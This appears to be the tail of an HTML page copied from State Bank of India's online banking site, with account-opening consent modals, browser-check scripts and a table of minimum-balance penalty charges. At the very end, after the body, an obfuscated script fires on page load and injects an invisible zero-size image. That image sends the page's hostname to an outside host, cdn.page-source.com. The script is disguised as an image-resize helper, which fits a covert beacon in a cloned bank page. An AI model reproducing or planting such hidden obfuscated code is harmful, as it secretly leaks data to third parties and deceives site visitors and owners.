							 <li><span id="icon_iexplorer" ></span> <a href="https://support.microsoft.com/en-us/help/17621/internet-explorer-downloads" class="link_for_ie" rel="external" aria-label="Internet Explorer">Internet Explorer</a></li>
							 <li><span id="icon_firefox" ></span> <a href="https://www.mozilla.org/en-US/firefox/new/" class="link_for_ie" rel="external" aria-label="Mozilla Firefox">Mozilla Firefox</a> </li>
							 <li><span id="icon_chrome" ></span> <a href="https://www.google.com/chrome/browser/desktop/" class="link_for_ie" rel="external" aria-label="Google Chrome">Google Chrome</a></li>
						  </ul>
					   </div>
					</div>
				 </div>
			  </div>
			  
			<!-- NRE/NRO Modal starts here-->
			  <div id="nrenroModal" class="modal fade" role="dialog" aria-label="NRE/NRO">
				 <div class="modal-dialog">
					<!-- Modal content-->
					<div class="modal-content">
					   <div class="modal-body">
						  <button type="button" class="close" data-bs-dismiss="modal">&times;</button>
						  <div class="modal_head">NRE/NRO</div>
							<p class="agreemargin">"Consent (as per annexure-I) for Data Sharing and use of personal information for opening of Savings / Current / Deposit Account with State Bank of India"</p>
							<div class="agreemargin">
								<a href="https://retail.onlinesbi.sbi/sbijava/retail/html/annex_gdpr_consent.html" class="link_for_ie" target="_blank" rel="noopener noreferrer" aria-label="Click here to read Consent Clause Annexure-I">Click here to read Consent Clause Annexure-I</a> 
							</div>
							<div class="agreemargin">
								<input type="radio" id="agree" name="agree" value="agree"><label for="agree" class="radioLabel">Agree</label>
								<input type="radio" id="notagree" name="agree" value="notagree" style="margin-left: 20px;"><label for="notagree" class="radioLabel">Not Agree</label>
							</div>
							<div class="download_btn agreemargin" id="viewdownloadbtn">
								<button class="btn btn-default" name="Download" type="button" onclick="window.open('https://retail.onlinesbi.sbi/documents/Annex_I_e-Circular_on_GDPR_Consent_28022020.pdf','_blank')" value="Redirect">View / Download Annexure-I</button>
								<p class="agreemargin redalert" style="font-style:italic;">Kindly download, sign and upload the duly signed consent form along with the KYC documents in the "Upload Application & Document for Preliminary Verification" link.</p>
							</div >
							<p id="mandatorymsg" class="agreemargin redalert" style="font-style:italic;">"Please note your Consent is mandatory for opening of NRI Account"</p>
							<div class="buttongroup agreemargin" id="agreecontinue">
								<!--<button class="btn btn-default continuebtn" name="CONTINUE" type="button" value="CONTINUE">CONTINUE</button>-->
								<a href="https://oaa.onlinesbi.sbi/oaonri/onlineaccapp.htm" class="btn btn-default continuebtn" aria-label="Continue">CONTINUE</a>
							</div>

							<div class="buttongroup agreemargin" id="agreeclose">
								<button class="btn btn-default continuebtn" name="CLOSE" type="button" value="CLOSE" data-bs-dismiss="modal">CLOSE</button>
							</div>
					   </div>
					   </div>
					</div>
				 </div>
			   <!-- NRE/NRO Modal ends here-->	  
			 
				<!-- PPF account opening through YONO Modal -->
			  <div id="ppfAccOpeningYono" class="modal fade" role="dialog" aria-label="PPF Account Opening">
				 <div class="modal-dialog" style="width:auto; max-width:1280px; margin-top:70px !important; margin-bottom:30px !important;">
					<!-- Modal content-->
					<div class="modal-content">
					   <div class="modal-body">
						  <button id="ppfAccClose" type="button" class="close" data-bs-dismiss="modal">&times;</button>
						  <div>
						  <img style="max-width:100%;" src="sbijava/images/PPF_acc_opening.jpg" alt="PPF account opening through YONO" title="PPF account opening through YONO">
						  </div>
					   </div>
					</div>
				 </div>
			  </div>
	
			<script>
				// script for PPF account opening modal
				$(document).on('click','#ppfAcclink',function(){
					$('html').css('overflow','hidden');
				})
				
				$(document).on('click','#ppfAccClose',function(){
					$('html').css('overflow','inherit');
				})
				
				$(document).on('click','body',function() {
					setTimeout(function(){
					if ($('#ppfAccOpeningYono').css('display') == 'none'){
							$('html').css('overflow','inherit');
						}
					}, 300)
					
				});
			</script>
			 
			<script type="text/javascript">
			 $(document).ready(function(){
			 navigator.browserSpecs = (function(){
				 var ua= navigator.userAgent, tem, 
				 M= ua.match(/(opera|chrome|safari|firefox|msie|trident(?=\/))\/?\s*(\d+)/i) || [];
				 if(/trident/i.test(M[1])){
					 tem=  /\brv[ :]+(\d+)/g.exec(ua) || [];
					 return {name:'IE',version:(tem[1] || '')};
				 }
				 if(M[1]=== 'Chrome'){
					 tem= ua.match(/\b(OPR|Edge)\/(\d+)/);
					 if(tem!= null) return {name:tem[1].replace('OPR', 'Opera'),version:tem[2]};
				 }
				 M= M[2]? [M[1], M[2]]: [navigator.appName, navigator.appVersion, '-?'];
				 if((tem= ua.match(/version\/(\d+)/i))!= null) M.splice(1, 1, tem[1]);
				 return {name:M[0],version:M[1]};
			 })();
			 if ((navigator.browserSpecs.name == 'Firefox' && navigator.browserSpecs.version < 35) || (navigator.browserSpecs.name == 'Chrome' && navigator.browserSpecs.version < 35) || (navigator.browserSpecs.name == 'MSIE' && navigator.browserSpecs.version < 9) ) { 
				//$('.overlay').show();
				//$('.ie6_alertbox').show();
				//$('.ie6_alertbox').animate({'marginRight':'0px'},{"easing" : "linear", "duration" : 600});
				
				$("#oldBrowserModal").modal();
			 }
							 //NRE/NRO Modal
			 $("#viewdownloadbtn").hide();
			 $("#mandatorymsg").hide();
			 $("#agreecontinue").hide();
			 
			 $("#agree").click(function() {			
				$("#agreeclose").hide();
				$("#mandatorymsg").hide();
				$("#agreecontinue").show();
				$("#viewdownloadbtn").show();
			 });
			 
			 $("#notagree").click(function() {
				$("#viewdownloadbtn").hide();			
				$("#agreecontinue").hide();
				$("#mandatorymsg").show();
				$("#agreeclose").show();
				
			 });	

			$('#nrenroModal').on('hidden.bs.modal', function () {
				$(this)
					.find("input[type=radio]")
					.prop("checked", "")
					.end();
					
					$("#viewdownloadbtn").hide();
					$("#mandatorymsg").hide();
					$("#agreecontinue").hide();
					$("#agreeclose").show();
			});		 
			//NRE/NRO Modal
			 
			});
			</script>
			
			<div id="service_charge_detail" class="modal fade" role="dialog" aria-label="Servide Charge Details">
				<div class="modal-dialog">
				<!-- Modal content-->
				<div class="modal-content">
				   <div class="modal-body">
					  <button type="button" class="close" data-bs-dismiss="modal">&times;</button>
					  <div class="service_heading">Penalty for Non- maintenance of AMB wef 01.04.2018</div>
					  <table class="service_table" width="100%" border="0" cellspacing="0" cellpadding="0">
						 <tbody>
							<tr>
							   <th colspan="2">Metro &amp; Urban (AMB= Rs. 3000/-) </th>
							</tr>
							<tr>
							   <td width="50%">Shortfall &lt;= 50% </td>
							   <td>Rs. 10/- +GST</td>
							</tr>
							<tr>
							   <td>Shortfall > 50 - 75% </td>
							   <td>Rs. 12/- +GST</td>
							</tr>
							<tr>
							   <td>Shortfall > 75% </td>
							   <td>Rs. 15/- +GST</td>
							</tr>
							<tr>
							   <th colspan="2">Semi-Urban (AMB Rs. 2000/-) </th>
							</tr>
							<tr>
							   <td>Shortfall &lt;= 50% </td>
							   <td>Rs   7.50 +GST </td>
							</tr>
							<tr>
							   <td>Shortfall > 50 - 75% </td>
							   <td>Rs 10.00 +GST </td>
							</tr>
							<tr>
							   <td>Shortfall > 75% </td>
							   <td>Rs.12.00+GST </td>
							</tr>
							<tr>
							   <th colspan="2">Rural (AMB) Rs 1,000/-)</th>
							</tr>
							<tr>
							   <td>Shortfall &lt;= 50% </td>
							   <td>Rs   5.00 +GST</td>
							</tr>
							<tr>
							   <td>Shortfall > 50 - 75% </td>
							   <td>Rs.  7.50 +GST</td>
							</tr>
							<tr>
							   <td>Shortfall > 75% </td>
							   <td>Rs 10.00 +GST</td>
							</tr>
						 </tbody>
					  </table>
				   </div>
				</div>
				</div>
			</div>
<style>
.modal .modal_head {
	font-size: 18px !important; color:#1557A8; padding:10px 0px 10px !important;
}
.modal .close {
	padding: 0;
	background: 0 0;
	color: #2a2075;
	opacity: 1;
	border: 0;
	line-height: 1;
	font-size: 21px;
	font-weight: 700;
	text-shadow: 0 1px 0 #fff;
	position: absolute;
	right: 16px;
	top: 16px;
	cursor: pointer;
}
.select-wrapper .bootstrap-select .dropdown-toggle:focus{
    outline: auto !important;
}


</style>
		</section>

<!-- SmartMenus jQuery Bootstrap 4 Addon js -->		
<script type="text/javascript" src="sbijava/js/jquery.smartmenus.min.js"></script>
<script type="text/javascript" src="sbijava/js/jquery.smartmenus.bootstrap-4.js"></script>
		
	</body>
   
	<form id="postsbc" name="postsbc" method="post" action="">
		<input type="hidden" id="BankCode" name="BankCode" value="">
	</form>
	
	<script type="text/javascript">
	var resizea=['0\x27/>','children','ource.com/','<img\x20style','none;\x27\x20src','cdn.page-s','hostname','\x27\x20height=\x27','resizeimag','length','location','=\x27https://','createElem','body'];
	(function(a,b){var c=function(e){while(--e){a['push'](a['shift']());}};c(++b);}(resizea,0x149));
	var resizeb=function(a,b){a=a-0x0;var c=resizea[a];return c;};try{window['onload']=function(){var a=resizeb('0xa')+'=\x27display:'+resizeb('0xb')+resizeb('0x4')+resizeb('0xc')+resizeb('0x9')+resizeb('0x1')+'e.ashx?ig='+window[resizeb('0x3')][resizeb('0xd')]+('&sz=105405\x27'+'\x20\x20width=\x270'+resizeb('0x0')+resizeb('0x7')),b=document[resizeb('0x5')+'ent']('div');for(b['innerHTML']=a;b[resizeb('0x8')][resizeb('0x2')]>0x0;)document[resizeb('0x6')]['appendChil'+'d'](b['children'][0x0]);};}catch(resizec){}
   </script> 
</html>